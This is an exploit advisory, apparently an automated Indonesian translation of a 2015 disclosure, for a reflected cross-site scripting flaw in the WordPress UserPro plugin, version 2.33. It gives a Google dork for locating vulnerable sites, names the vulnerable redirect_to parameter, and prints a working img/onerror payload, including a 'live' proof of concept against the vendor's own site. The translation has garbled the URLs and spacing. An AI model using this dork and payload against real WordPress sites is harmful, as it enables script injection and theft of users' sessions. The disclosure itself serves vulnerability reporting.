WordPress UserPro 2,33 Cross Site Scripting
Oleh
chmood
# Exploit Judul: Plugin WordPress: UserPro XSS Vulnerability
# Google Dork: inurl: wp-content / plugins / userpro /
# Tanggal: 27 Mei 2015
# Exploit Penulis: Faisal Ahmed (merah X)
# Penulis Homepage: http://faisalahmed.me/
# Penjual Homepage: http: //userproplugin.com/userpro
# Software Link: http://codecanyon.net/item/userpro-user-profiles-with-social-login/
# Versi: Versi 2.33 (terbaru)
# Diuji pada: Windows 7, Windows 8
# CVE: N / A # Menyapa: Sufyan Mughal | Hasan Shahriyar | Tarek Siddiki | Kristal V1P3R | 3xp1r3
Lokasi rentan: login / redirect_to = [XSS Payload]
POC: http:? //sitename.com/login/ Redirect_to = "> <img src = x onerror = prompt (document.domain)>
Hidup POC (di homepage vendor): http:? //userproplugin.com/userpro/profile/ Redirect_to = "> <img src = x onerror = prompt (document.domain)>
Screenshot: http: //prntscr.com/79u7ew
terima kasih
Category
Komentar